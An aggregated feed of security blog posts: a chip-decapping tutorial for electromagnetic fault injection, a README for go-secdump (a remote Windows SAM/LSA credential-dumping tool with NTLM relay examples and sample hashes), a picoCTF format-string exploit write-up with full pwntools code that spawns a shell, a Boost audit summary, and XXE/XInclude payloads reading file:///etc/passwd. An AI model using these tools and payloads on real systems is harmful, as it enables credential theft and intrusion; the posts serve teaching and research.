❌

Normal view

There are new articles available, click to refresh the page.
Today β€” 23 May 2024Main stream

MindShaRE: Decapping Chips for Electromagnetic Fault Injection (EMFI)

Recently, the automotive VR team has undertaken an effort to reproduce the software extraction attack against one of the target devices used during the Automotive Pwn2Own 2024 held in Tokyo, Japan. The electromagnetic fault injection (EMFI) approach was chosen to attempt an attack against the existing readout protection mechanisms. This blog post details preparatory steps to speed up the attack, hopefully considerably.

Electromagnetic fault injection

In general, fault injection attacks against hardware attempt to produce some sort of gain for an attacker by injecting faults into a device under attack by manipulating clock pulses, supply voltages, temperature, electromagnetic fields around the device, and aiming short light pulses at certain locations on the device. Of these vectors, EMFI stands out as probably the only attack approach that requires close to no modifications of the device under attack, with all action being conducted at a quite short distance. The attack then proceeds by moving an EM probe above the device in very small increments and triggering an EM pulse. With any luck, this would disturb the normal operation of the device under attack in just the right way to cause the desired effect.

Practically speaking, some sort of an EM pulse tool is required to conduct the attack. In this case, the PicoEMP was chosen for that purpose, which has been mounted on a modified 3D printer carriage.

Figure 1 - The ChipSHOUTER-PicoEMP

However, the device in question (a GD32F407Z by GigaDevice) is physically rather large, with the package measuring 20mm by either side. Considering how long each individual attempt runs, the fact that the attempt needs to be retried multiple times to collect meaningful outcome statistics, and rather small increments used to move the probe, it would make sense to narrow down the search area as much as possible. Injecting EM faults into the epoxy encapsulation would not bring much of an effect.

Decapping

Unfortunately, the encapsulation is not transparent and does not allow for easy visual identification of the die in the package. This means that some way of getting the die out is required to measure it, or better yet, leave the die in the package so it will be possible to measure both the die dimensions and the position of the die within the package.

There are multiple approaches to decapsulation, or decapping for short:

Β·Β Β Β Β Β  Mechanical: sanding or milling the package, cracking the encapsulation when heated
Β·Β Β Β Β Β  Chemical: applying acid to dissolve encapsulation
Β·Β Β Β Β Β  Thermal: placing the package in a furnace to burn encapsulation away
Β·Β Β Β Β Β  Optical: using a laser to burn encapsulation away in a precise manner

Of these, many require specialized equipment (mill, laser, furnace, fume hood for nitric acid), are time-consuming (sanding), or do not preserve important information (cracking the package). The choice was thus limited to what was available: hot sulfuric acid.

DANGER: Hot sulfuric acid is extremely corrosive; avoid spilling and wear proper PPE at all times.

DANGER: Sulfuric acid vapors are extremely corrosive; avoid inhaling and work in a well-ventilated area (fume hood or outside).

NOTE: Study relevant safety information including but not limited to materials handling, spill containment, and clean-up procedures before working with any hazardous chemicals.

NOTE: This blog post was written purely for educational purposes; any attempts to replicate the work are at your own risk.

Decapping process

As my home lab is, sadly, not equipped with a fume hood, all work was conducted outside.

Figure 2 - Example of tools used

The following tools were used:

Β·Β Β Β Β Β  Sulfuric acid, 96%
Β·Β Β Β Β Β  A heat source in the form of a hot air station
Β·Β Β Β Β Β  A crocodile clip β€œhelping hands”
Β·Β Β Β Β Β  A squirt bottle with acetone
Β·Β Β Β Β Β  A PE pipette
Β·Β Β Β Β Β  A waste container.

To begin, the device under attack is fixed in the clip, and a small drop of acid was applied with the pipette in the package center.

Figure 3 - Applying sulfuric acid

The device was then heated using the hot air station set to 200Β°C Β and a moderate air flow of around 40%. The aim of this process is to slowly dissolve the packaging epoxy. The device was heated until some fuming was observed from the drop and stopped before any bubbling would occur. If the acid gets hot enough to produce bubbles, the material will form a hard carbonized β€œcake” which will be problematic to remove. Unfortunately, this has been a problem before.

After the acid visibly darkened, which should take around 1 minute +- 50%, the heating was stopped, and the device was allowed to cool down somewhat. Then, the acid was washed off with acetone into the waste container. The device then was dried off with hot air to remove moisture.

The process was then repeated multiple times, with each iteration removing a bit of the packaging material. This was captured in the following series of images (more steps were taken than is presented here):

Figure 4 - Time lapse of decapping process

A stack of dice slowly emerged from the package: the larger one is the microcontroller itself, and the smaller one is the serial Flash memory holding all the programmed code and data. Unfortunately, the current process does not preserve the bond wires, rendering the device inoperable. Its operation was not required in our case. This could possibly be mitigated by using a 98% acid and anhydrous acetone – something to attempt in the future.

Measurements

The end result of the decapping process is pictured below.

Figure 5 - End result of decapping

Using a graphics editor, it is possible to take measurements in pixels of the package, the die, and the die positioning. This came out to be the following:

Β·Β Β Β Β Β  Package size 1835x1835 pixels (measured) = 20x20 mm (known from the datasheet)
Β·Β Β Β Β Β  Pixels per mm: 91.75
Β·Β Β Β Β Β  Die size 366x366 pixels (measured) = 4x4mm (computed)
Β·Β Β Β Β Β  Die offset from bottom left: 745x745 pixels (measured) = 8.12x8.12mm (computed)

The obtained numbers are immediately useful to program the EM probe motion restricted to the die area only. To find out how much experiment time this could save, let’s compute the areas: 4x4 = 16 mm2 for the die itself, and 20x20 = 400 mm2 for the whole package. This is 25 times decrease in the area and thus the experiment time.

Another approach that could avoid the decapping process is moving the probe in a spiral fashion, starting from the package center and moving outwards. This is of course possible to implement. However, the challenge here is the possibility of the two dice getting packaged side-to-side instead of being stacked like in this example – this would severely decrease the gain from this approach. Given the decapping only takes no more than 1-2 hours including cleanup, this was deemed well worth the information gained – and the die pictures obtained.

Conclusion

I hope you enjoyed this brief tutorial. Again, please take caution when using sulfuric acid or any other corrosive agents. Please dispose of waste materials responsibly. The world of hardware hacking offers many opportunities for discovery. We’ll continue to post guides and methodologies in future posts. Until then, you can follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

Go-Secdump - Tool To Remotely Dump Secrets From The Windows Registry


Package go-secdump is a tool built to remotely extract hashes from the SAM registry hive as well as LSA secrets and cached hashes from the SECURITY hive without any remote agent and without touching disk.

The tool is built on top of the library go-smb and use it to communicate with the Windows Remote Registry to retrieve registry keys directly from memory.

It was built as a learning experience and as a proof of concept that it should be possible to remotely retrieve the NT Hashes from the SAM hive and the LSA secrets as well as domain cached credentials without having to first save the registry hives to disk and then parse them locally.

The main problem to overcome was that the SAM and SECURITY hives are only readable by NT AUTHORITY\SYSTEM. However, I noticed that the local group administrators had the WriteDACL permission on the registry hives and could thus be used to temporarily grant read access to itself to retrieve the secrets and then restore the original permissions.


Credits

Much of the code in this project is inspired/taken from Impacket's secdump but converted to access the Windows registry remotely and to only access the required registry keys.

Some of the other sources that have been useful to understanding the registry structure and encryption methods are listed below:

https://www.passcape.com/index.php?section=docsys&cmd=details&id=23

http://www.beginningtoseethelight.org/ntsecurity/index.htm

https://social.technet.microsoft.com/Forums/en-US/6e3c4486-f3a1-4d4e-9f5c-bdacdb245cfd/how-are-ntlm-hashes-stored-under-the-v-key-in-the-sam?forum=win10itprogeneral

Usage

Usage: ./go-secdump [options]

options:
--host <target> Hostname or ip address of remote server
-P, --port <port> SMB Port (default 445)
-d, --domain <domain> Domain name to use for login
-u, --user <username> Username
-p, --pass <pass> Password
-n, --no-pass Disable password prompt and send no credentials
--hash <NT Hash> Hex encoded NT Hash for user password
--local Authenticate as a local user instead of domain user
--dump Saves the SAM and SECURITY hives to disk and
transfers them to the local machine.
--sam Extract secrets from the SAM hive explicitly. Only other explicit targets are included.
--lsa Extract LSA secrets explicitly. Only other explicit targets are included.
--dcc2 Extract DCC2 caches explicitly. Only ohter explicit targets are included.
--backup-dacl Save original DACLs to disk before modification
--restore-dacl Restore DACLs using disk backup. Could be useful if automated restore fails.
--backup-file Filename for DACL backup (default dacl.backup)
--relay Start an SMB listener that will relay incoming
NTLM authentications to the remote server and
use that connection. NOTE that this forces SMB 2.1
without encryption.
--relay-port <port> Listening port for relay (default 445)
--socks-host <target> Establish connection via a SOCKS5 proxy server
--socks-port <port> SOCKS5 proxy port (default 1080)
-t, --timeout Dial timeout in seconds (default 5)
--noenc Disable smb encryption
--smb2 Force smb 2.1
--debug Enable debug logging
--verbose Enable verbose logging
-o, --output Filename for writing results (default is stdout). Will append to file if it exists.
-v, --version Show version

Changing DACLs

go-secdump will automatically try to modify and then restore the DACLs of the required registry keys. However, if something goes wrong during the restoration part such as a network disconnect or other interrupt, the remote registry will be left with the modified DACLs.

Using the --backup-dacl argument it is possible to store a serialized copy of the original DACLs before modification. If a connectivity problem occurs, the DACLs can later be restored from file using the --restore-dacl argument.

Examples

Dump all registry secrets

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local
or
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2

Dump only SAM, LSA, or DCC2 cache secrets

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2

NTLM Relaying

Dump registry secrets using NTLM relaying

Start listener

./go-secdump --host 192.168.0.100 -n --relay

Trigger an auth to your machine from a client with administrative access to 192.168.0.100 somehow and then wait for the dumped secrets.

YYYY/MM/DD HH:MM:SS smb [Notice] Client connected from 192.168.0.30:49805
YYYY/MM/DD HH:MM:SS smb [Notice] Client (192.168.0.30:49805) successfully authenticated as (domain.local\Administrator) against (192.168.0.100:445)!
Net-NTLMv2 Hash: Administrator::domain.local:34f4533b697afc39:b4dcafebabedd12deadbeeffef1cea36:010100000deadbeef59d13adc22dda0
2023/12/13 14:47:28 [Notice] [+] Signing is NOT required
2023/12/13 14:47:28 [Notice] [+] Login successful as domain.local\Administrator
[*] Dumping local SAM hashes
Name: Administrator
RID: 500
NT: 2727D7906A776A77B34D0430EAACD2C5

Name: Guest
RID: 501
NT: <empty>

Name: DefaultAccount
RID: 503
NT: <empty>

Name: WDAGUtilityAccount
RID: 504
NT: <empty>

[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: 0x15deadbeef645e75b38a50a52bdb67b4
$MACHINE.ACC:plain_password_hex:47331e26f48208a7807cafeababe267261f79fdc 38c740b3bdeadbeef7277d696bcafebabea62bb5247ac63be764401adeadbeef4563cafebabe43692deadbeef03f...
[*] DPAPI_SYSTEM
dpapi_machinekey: 0x8afa12897d53deadbeefbd82593f6df04de9c100
dpapi_userkey: 0x706e1cdea9a8a58cafebabe4a34e23bc5efa8939
[*] NL$KM
NL$KM: 0x53aa4b3d0deadbeef42f01ef138c6a74
[*] Dumping cached domain credentials (domain/username:hash)
DOMAIN.LOCAL/Administrator:$DCC2$10240#Administrator#97070d085deadbeef22cafebabedd1ab
...

SOCKS Proxy

Dump secrets using an upstream SOCKS5 proxy either for pivoting or to take advantage of Impacket's ntlmrelayx.py SOCKS server functionality.

When using ntlmrelayx.py as the upstream proxy, the provided username must match that of the authenticated client, but the password can be empty.

./ntlmrelayx.py -socks -t 192.168.0.100 -smb2support --no-http-server --no-wcf-server --no-raw-server
...

./go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080


Format String Exploitation: A Hands-On Exploration for Linux

23 May 2024 at 11:00
Format String Exploitation Featurerd Image

Summary

This blogpost covers a Capture The Flag challenge that was part of the 2024 picoCTF event that lasted until Tuesday 26/03/2024. With a team from NVISO, we decided to participate and tackle as many challenges as we could, resulting in a rewarding 130th place in the global scoreboard. I decided to try and focus on the binary exploitation challenges. While having followed Corelan’s Stack & Heap exploitation on Windows courses, Linux binary exploitation was fairly new to me, providing a nice challenge while trying to fill that knowledge gap.

The challenge covers a format string vulnerability. This is a type of vulnerability where submitted data of an input string is evaluated as an argument to an unsafe use of e.g., a printf() function by the application, resulting in the ability to read and/or write to memory. The format string 3 challenge provides 4 files:

These files are provided to analyze the vulnerability locally, but the goal is to craft an exploit to attack a remote target that runs the vulnerable binary.

The steps of the final exploit:

  1. Fetch the address of the setvbuf function in libc. This is actually provided by the vulnerable binary itself via a puts() function to simulate an information leak printed to stdout,
  2. Dynamically calculate the base address of the libc library,
  3. Overwrite the puts function address in the Global Offset Table (GOT) with the system function address using a format string vulnerability.

For step 2, it’s important to calculate the address dynamically (vs statically/hardcoded) since we can validate that the remote target loads modules at different addresses every time it’s being run. We can verify this by running the binary multiple times, which provides different memory addresses each time it is being run. This is due to the combination of Address Space Layout Randomization (ASLR) and the Position Independent Executable (PIE) compiler flag. The latter can be verified by using readelf on our binary since the binary is provided as part of the challenge.

Interesting resource to learn more about the difference between these mitigations: ASLR/PIE – Nightmare (guyinatuxedo.github.io)

Then, by spawning a shell, we can read and submit the flag file content to solve the challenge.

Vulnerability Details

Background on string formatting

The challenge involved a format string vulnerability, as suggested by its name and description. This vulnerability arises when user input is directly passed and used as arguments to functions such as the C library’s printf() and its variants:

int printf(const char *format, ...)
int fprintf(FILE *stream, const char *format, ...)
int sprintf(char *str, const char *format, ...)
int vprintf(const char *format, va_list arg)
int vsprintf(char *str, const char *format, va_list arg)
C

Even with input validation in place, passing input directly to one of these functions (think: printf(input)) should be avoided. It’s recommended to use placeholders and string formatting such as printf("%s", input) instead.

The impact of a format string vulnerability can be divided in a few categories:

  • Ability to read values on the stack
  • Arbitrary memory reads
  • Arbitrary memory writes

In the case where arbitrary memory writes are possible, an adversary may obtain full control over the execution flow of the program and potentially even remote code execution.

Background on Global Offset Table

Both the Procedure Linkage Table (PLT) & Global Offset Table (GOT) play a crucial role in the execution of programs, especially those compiled using shared libraries – almost any binary running on a modern system.

The GOT serves as a central repository for storing addresses of global variables and functions. In the current context of a CTF challenge featuring a format string vulnerability, understanding the GOT is crucial. Exploiting this vulnerability involves manipulating the addresses stored in the GOT to redirect program flow.

When an executable is programmed in C to call function and is compiled as an ELF executable, the function will be compiled as function@plt. When the program is executed, it will jump to the PLT entry of function and:

  • If there is a GOT entry for function, it jumps to the address stored there;
  • If there is no GOT entry, it will resolve the address and jump there.

An example of the first option, where there is a GOT entry for function, is depicted in the visual below:

During the exploitation process, our goal is to overwrite entries in the GOT with addresses of our choosing. By doing so, we can redirect the program’s execution to arbitrary locations, such as shellcode or other parts of memory under our control.

Reviewing the source code

We are provided with the following source code:

#include <stdio.h>

#define MAX_STRINGS 32

char *normal_string = "/bin/sh";

void setup() {
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stdout, NULL, _IONBF, 0);
	setvbuf(stderr, NULL, _IONBF, 0);
}

void hello() {
	puts("Howdy gamers!");
	printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
}

int main() {
	char *all_strings[MAX_STRINGS] = {NULL};
	char buf[1024] = {'\0'};

	setup();
	hello();	

	fgets(buf, 1024, stdin);	
	printf(buf);

	puts(normal_string);

	return 0;
}
C

Since we have a compiled version provided from the challenge, we can proceed and make it executable. We then do a test run, which provides the following output:

# Making both the executable & linker executable
chmod u+x format-string-3 ld-linux-x86-64.so.2

# Executing the binary
./format-string-3

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f7c778eb3f0

# This is our input, ending with <enter>
test

test
/bin/sh
Bash

We note a couple of things:

  • The binary provides us with the memory address of the setvbuf function in the libc library,
  • We have a way of providing a string as input which is read by the fgets function and printed back in an unsafe manner using printf,
  • The program finishes with a puts() function call that writes /bin/sh to stdout.

This is hinting towards a memory address overwrite of the puts() function to replace it with the system() function address. As a result, it will then execute system("/bin/sh") and spawn a shell.

Vulnerability #1: Memory Leak

If we take another look at the source code above, we notice the following line in the hello() function:

printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
C

Here, the creators of the challenge intentionally leak a memory address to make the challenge easier. If not, we would have to deal with finding an information leak ourselves to bypass Address Space Layout Randomization (ASLR), if enabled.

We can still treat this as an actual information leak that provides us a memory address during runtime. We will use this information to dynamically calculate the base address of the libc library based on the setvbuf function address in the exploitation section below.

Vulnerability #2: Format String Vulnerability

In the test run above we provided a simple test string as input to the program, which was printed back to stdout via the puts(buf) function call. In an excellent paper that can be found here, we learned that we can use format specifiers in C to:

  • Read arbitrary stack values, using format specifiers such as %x (hexadecimal) or %p (pointers),
  • Read from arbitrary memory addresses using a combination of %c to move the argument pointer and %s to print the contents of memory starting from an address we specify in our input string,
  • Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m. Then, we can write the output counter value to memory using %n, again if we provide the memory address correctly as part of our input string.

Even though the source code already indicates that our input is unsafely processed and parsed as an argument for the printf() function, we can verify that we have a format string vulnerability here by providing %p as input, which should read a value as a pointer and print it back to us:

# Executing the binary
./format-string-3

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f2818f423f0

# This is our input, ending with <enter>
%p

# This is the output of the printf(buf) function call
# This now prints back a value as a pointer
0x7f28190a0963
/bin/sh
Bash

The challenge preceding format string 3, called format string 2, actually provided very good practice to get to know format string specifiers and how you can abuse them to read from memory and write to memory. Highly recommended!

Exploitation

We are now armed with an information leak that provides us a memory address and a format string vulnerability. Let’s try and combine these two to get code execution on our remote system.

Calculating input string offset

Before we can really start, there is something we need to address: how do we know where our input string is located in memory once we have sent it to the program? And why does this even matter?

Let’s first have a look at the input AAAAAAAA%2$p. This provides 8 A characters, and then a format specifier to read the 2nd argument to the printf() function, which will, in this case, be a value from memory:

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7fa5ae99b3f0
AAAAAAAA%2$p
AAAAAAAA0xfbad208b
/bin/sh
Bash

Ideally (we’re explaining why later), we have a format specifier %n$p where n is an offset to point exactly at the start of our input string. You can do this manually (%p, %2$p, %3$p…) until %p points to your input string, but I did this using gdb:

# Open the program in gdb
gdb format-string-3

# Put a breakpoint at the puts function
b puts

# Run the program
r

# Continue the program since it will hit the breakpoint 
# on the first puts call in our program (Howdy Gamers !)
c

# Provide our input AAAAAAAA followed by <enter>
AAAAAAAA
Bash

The program should now hit the breakpoint on puts() again, after which we can look at the stack using context_stack 50 to print 50Γ—8 bytes on the stack. You should be able to identify your input string on the 33rd line, which we can easily calculate by dividing the number of bytes by 8:

Calculating offset based on stack line position.

You could assume that 33 is the offset we need, but there’s a catch:

From https://lettieri.iet.unipi.it/hacking/format-strings.pdf:

On 64b systems, the first 5 %lx will print the contents of the rsi, rdx, rcx, r8, and r9, and any additional %lx will start printing successive 8-byte values on the stack.

This means we need to add 5 to our offset to compensate for the 5 registers, resulting in a final offset of 38, as can be seen in the following visual:

Offset calculation arbitrary read
Created using Excalidraw

The offset displayed on top of the visual indicates the relative offset from the start of the stack.

This offset now points exactly to the start of our input string:

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ff5ed4873f0
AAAAAAAA%38$p
AAAAAAAA0x4141414141414141
/bin/sh
Bash

AAAAAAAA is converted to 0x4141414141414141 in hexadecimal since we are printing the input string as a pointer using %p.

Now the (probably) more critical question to understand the answer to: why does it matter that we know how to point to our input string in memory? Up until this point, we have only been reading our own string in memory. What will happen when we replace our %p format specifier to read, to the %n format specifier?

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f4bfd3ff3f0
AAAAAAAA%38$n
zsh: segmentation fault  ./format-string-3
Bash

We get a segmentation fault. What is going on? Our input string now tries to write the value of the output counter to the memory address we were pointing to before with %p, which is… our input string itself.

This means we now have control over where we can write values since we control the input string. We can also modify what we are writing to memory as long as we can control the output counter. We also have control over this, as explained before:

Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m.

By changing the format specifier, we now executed the following:

Offset calculation arbitrary write
Created using Excalidraw

To clearly grasp the concept: if we change our input string to BBBBBBBB, we will now write to 0x4242424242424242 instead, indicating we can control to which memory address we are writing something by modifying our input string.

In this case, we received a segmentation fault since the memory at 0x4141414141414141 is not writeable (page protections, not mapped…). In the next part, we’re going to convert our arbitrary write primitive to effectively do something useful by overwriting an entry in the Global Offset Table.

Local Exploitation

Let’s take a step back and think what we logically need to do. We need to:

  1. Fetch the address of our setvbuf function in the libc library, provided by the program,
  2. From this address, calculate the base address of libc,
  3. Send a format string payload that overwrites the puts function address in the GOT with the system function address in libc,
  4. Continue execution to give control to the operator.

We are going to use the popular pwntools library for Python 3 to help us out quite a bit.

First, let’s attach to our program and print the lines until we hit the libc: output string, then store the memory address in an integer:

from pwn import *

p = process("./format-string-3")

info(p.recvline())              # Fetch Howdy Gamers!
info(p.recvuntil("libc: "))     # Fetch line right before setvbuffer address

# Get setvbuffer address
bytes_setvbuf_address = p.recvline()

# Convert output bytes to integer to store and work with our address
setvbuf_leak = int(bytes_setvbuf_address.split(b"x")[1].strip(),16)
info("Received setvbuf address leak: %s", hex(setvbuf_leak))
Python

### Sample Output
[+] Starting local process './format-string-3': pid 216507
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc: 
[*] Received setvbuf address leak: 0x7fb19acc83f0
[*] Stopped process './format-string-3' (pid 216507)
Bash

Second, we manually load libc to be able to set its base address to match our (now local, but future remote) target libc base address. We do this by subtracting the setvbuf function address from our manually loaded libc from our leaked function address:

...
libc = ELF("./libc.so.6")
info("Calculating libc base address...")
libc.address = setvbuf_leak - libc.symbols['setvbuf']
info("libc base address: %s", hex(libc.address))
Python

### Sample Output
[+] Starting local process './format-string-3': pid 219013
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc: 
[*] Received setvbuf address leak: 0x7f25a21de3f0
[*] Calculating libc base address...
[*] libc base address: 0x7f25a2164000
[*] Stopped process './format-string-3' (pid 219013)
Bash

Finally, we can utilize the fmstr_payload function of pwntools to easily write:

  • What: the system function address in libc
  • Where: the puts entry in the GOT of our binary

Before actually executing and sending our payload, let’s make sure we understand what’s happening. We start by noting down the addresses of:

  • the system function address in libc (0x7f852ddca760)
  • the puts entry in the GOT of our binary (0x404018)

next to the payload we are going to send in an interactive Python prompt, for demonstration purposes:

>>> elf = context.binary = ELF('./format-string-3')
>>> hex(libc.symbols['system'])
'0x7f852ddca760'
>>> hex(elf.got['puts'])
'0x404018'
>>> fmtstr_payload(38, {elf.got['puts'] : libc.symbols['system']})
b'%96c%47$lln%31c%48$hhn%6c%49$hhn%34c%50$hhn%53c%51$hhn%81c%52$hhnaaaabaa\x18@@\x00\x00\x00\x00\x00\x1d@@\x00\x00\x00\x00\x00\x1c@@\x00\x00\x00\x00\x00\x19@@\x00\x00\x00\x00\x00\x1a@@\x00\x00\x00\x00\x00\x1b@@\x00\x00\x00\x00\x00'
Python

You can divide the payload in different blocks, each serving the purpose we expected, although it’s quite a step up from what we’ve manually done before. We can identify the pattern %mc%n$hhn (or ending lln), which:

  • Increases the output counter with m (note that the output counter does not necessarily start at 0)
  • Writes the value of the output counter to the address selected by %n$hhn. The first n selects the relevant entry on the stack where our input string memory address is located. The second part, $hhn, resembles our expected %n format specifier, but the double hh is a modifier to truncate the output counter value to the size of a char, thus allowing us to write 1 byte.
Offset calculation precision write
Created using Excalidraw

Let’s now analyze the payload and calculate ourselves for 1 write operation to understand how the payload works. We have %96c%47$lln as the first block of our payload, which can be logically seen as a write operation. This:

  • Increases the output counter with 96h (hex) or 150d (decimal)
  • Writes the current value of the output counter (n, truncated by a long long (ll), or 8 bytes, to the memory address specified at offset 42:

As you can see in the payload above, offset 42 will correspond with \x18@@\x00\x00\x00\x00\x00, which is further down our payload. @ is \x40 in hex, so our target address matches the value for the puts entry in the GOT if we swap the endianness: \x00\x00\x00\x00\x00\x40\x40\x18, or 0x404018. This clearly indicates we are writing to the correct memory location, as expected.

You’ll notice that aaaabaa is also part of our payload: this serves as padding to correctly align our payload to have 8-byte addresses on the stack. The start of an offset on the stack should contain exactly the start of our 8-byte memory address to write to, since we’re working on a 64-bit system. If no padding is present, a reference to an offset would start in the middle of a memory address.

After writing, the payload will continue with processing the next block %31c%48$hhn, which again increases the output counter and writes to the next offset (43). This offset contains our next address. The payload will continue until 6 blocks are executed, which corresponds to 6 %…%n statements.

Now that we understand the payload, we load the binary using ELF and send our payload to our target process, after which we give interactive control to the operator:

...
elf = context.binary = ELF('./format-string-3')
info("Creating format string payload...")
payload = fmtstr_payload(38, {elf.got['puts'] : libc.symbols['system']})

# Ready to send payload!
info("Sending payload...")
p.sendline(payload)
p.clean()

# Give control to the shell to the operator
info("Payload successfully sent, enjoy the shell!")
p.interactive()
Python

The fmtstr_payload function really does a lot of heavy lifting for us combined with the elf and libc references. It effectively writes the complete address of libc.symbols[β€˜system’] to the location where elf.got[β€˜puts’] originally was in memory by precisely modifying the output counter and executing memory write operations.

### Sample Output
[+] Starting local process './format-string-3': pid 227263
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc: 
[*] Received setvbuf address leak: 0x7fa7c29473f0
[*] '/home/kali/picoctf/libc.so.6'
[*] Calculating libc base address...
[*] libc base address: 0x7fa7c28cd000
[*] '/home/kali/picoctf/format-string-3'
[*] Creating format string payload...
[*] Sending payload...
[*] Payload successfully sent, enjoy the shell!
[*] Switching to interactive mode
$ whoami
kali
Bash

We successfully exploited the format string vulnerability and called system('/bin/sh'), resulting in an interactive shell!

Remote Exploitation

Switching to remote exploitation is trivial in this challenge, since we can simply reuse the local files to do our calculations. Instead of attaching to a local process using p = process("./format-string-3"), we substitute this by connecting to a remote target:

# Define remote targets
target_host = "rhea.picoctf.net"
target_port = 62200

# Connect to remote process
p = remote(target_host, target_port)
Python

Note that you’ll need to substitute the port that is provided to you after launching the instance on the picoCTF platform.

### Sample Output
...
[*] Payload successfully sent, enjoy the shell!
[*] Switching to interactive mode
$ ls flag.txt
flag.txt
Python

That concludes the exploit, after which we can submit our flag. In a real world scenario, getting this kind of remote code execution would clearly be a great risk.

Conclusion

The preceding challenges that lead up to this challenge (format string 0, 1, 2) proved to be a great help in understanding format string vulnerabilities and how to exploit them. Since Linux exploitation is a new topic to me, this was a great way to practice these types of vulnerabilities during a fun event.

Format string vulnerabilities are less common than they used to be, however, our IoT colleagues assured me they encountered some recently during an IoT device assessment.

That’s why it’s important to adhere to:

  • Input Validation
  • Limit User-Controlled Input
  • Enable (or pay attention to already enabled) compiler warnings for format string vulnerabilities
  • Secure Coding Practices

This should greatly limit the risk of format string vulnerabilities still being present in current day applications.

References

About the author

Wiebe Willems picture.

Wiebe Willems

Wiebe Willems is a Cyber Security Researcher active in the Research & Development team at NVISO. With his extensive background in Red & Purple Teaming, he is now driving the innovation efforts of NVISO’s Red Team forward to deliver even better advisory to its clients.

Wiebe honed his skills by getting certifications for well-known Red Teaming trainings, next to taking deeply technical courses about stack & heap exploitation.

Yesterday β€” 22 May 2024Main stream

Boost Security Audit

22 May 2024 at 14:45
TL;DR Shielder, with OSTIF and Amazon Web Services, performed a Security Audit on a subset of the Boost C++ libraries. The audit resulted in five (5) findings ranging from low to medium severity plus two (2) informative notices. The Boost maintainers of the affected libraries addressed some of the issues, while some other were acknowledged as accepted risks. Today, we are publishing the full report in our dedicated repository. Introduction In December 2023, Shielder was hired to perform a Security Audit of Boost, a set of free peer-reviewed portable C++ source libraries.

Getting XXE in Web Browsers using ChatGPT

By: admin
22 May 2024 at 14:12

A year ago, I wondered what a malicious page with disabled JavaScript could do.

I knew that SVG, which is based on XML, and XML itself could be complex and allow file access. Is the Same Origin Policy (SOP) correctly implemented for all possible XML and SVG syntaxes? Is access through the file:// protocol properly handled?

Since I was too lazy to read the documentation, I started generating examples using ChatGPT.

XSL

The technology I decided to test is XSL. It stands for eXtensible Stylesheet Language. It’s a specialized XML-based language that can be used within or outside of XML for modifying it or retrieving data.

In Chrome, XSL is supported and the library used is LibXSLT. It’s possible to verify this by using system-property('xsl:vendor') function, as shown in the following example.

system-properties.xml
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet href="system-properties.xsl" type="text/xsl"?>  
<root/>
system-properties.xsl
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<p>
Version: <xsl:value-of select="system-property('xsl:version')" /> <br />
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
</p>
</xsl:template>
</xsl:stylesheet>

Here is the output of the system-properties.xml file, uploaded to the local web server and opened in Chrome:

The LibXSLT library, first released on September 23, 1999, is both longstanding and widely used. It is a default component in Chrome, Safari, PHP, PostgreSQL, Oracle Database, Python, and numerous others applications.

The first interesting XSL output from ChatGPT was a code with functionality that allows you to retrieve the location of the current document. While this is not a vulnerability, it could be useful in some scenarios.

get-location.xml
<?xml-stylesheet href="get-location.xsl" type="text/xsl"?>  
<!DOCTYPE test [  
    <!ENTITY ent SYSTEM "?" NDATA aaa>  
]>
<test>
<getLocation test="ent"/>
</test>
get-location.xsl
<xsl:stylesheet version="1.0"  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  
>  
  <xsl:output method="html"/>  
  <xsl:template match="getLocation">  
          <input type="text" value="{unparsed-entity-uri(@test)}" />  
  </xsl:template>  
</xsl:stylesheet>

Here is what you should see after uploading this code to your web server:

All the magic happens within the unparsed-entity-uri() function. This function returns the full path of the β€œent” entity, which is constructed using the relative path β€œ?”.

XSL and Remote Content

Almost all XML-based languages have functionality that can be used for loading or displaying remote files, similar to the functionality of the <iframe> tag in HTML.

I asked ChatGPT many times about XSL’s content loading features. The examples below are what ChatGPT suggested I use, and the code was fully obtained from it.

XML External Entities

Since XSL is XML-based, usage of XML External Entities should be the first option.

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<test>&xxe;</test>
XInclude

XIncludeΒ is an XML add-on that’s described in a W3C Recommendation from November 15, 2006.

<?xml version="1.0"?>
<test xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="file:///etc/passwd"/>
</test>
XLS’s <xsl:import> and <xsl:include> tags

These tags can be used to load files as XSL stylesheets, according to ChatGPT.

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:include href="file:///etc/passwd"/>
  <xsl:import href="file:///etc/passwd"/>
</xsl:stylesheet>
XLS’s document() function

XLS’s document() functionΒ can be used for loading files as XML documents.

